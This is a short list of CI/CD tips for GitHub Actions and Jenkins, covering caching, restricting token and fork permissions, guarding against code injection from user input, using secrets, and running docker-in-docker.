-
Utilize cache in order not to re-build unchanged dependencies or indices.
- For general usage one can use caching action actions/cache
- During docker-build use
--cache-fromparameter.
-
Limit access of used
GITHUB_TOKENvia permissions. You can also limit default permissions at settings: -
If a workflow runs on
pull_request, make sure to disable automatic run from 3rd party forks. Go to theSettings -> Actions: -
Make sure that used github actions are secure. Limit allowed actions to only trusted ones via Actions settings:
-
Pass user input to scripts only via "proxy-variables" or use as input to actions in order to prevent code injection.
-
Utilize Github Secrets for sensitive data such as credentials.
Since we do run Jenkins inside docker and run agent as docker, we need docker-in-docker (dind) installation. One idea is to just mount a docker socket. Another approach is to run dind in a separate container as described in the following docker-compose file
- Some tasks in jenkins can be executed in parallel, take advantage of it you have independent steps Yet be very careful in order not to create race conditions or not to make uncotrolled requests to resources with exclusive access. Throttle concurrent build plugin may help to control concurrent builds.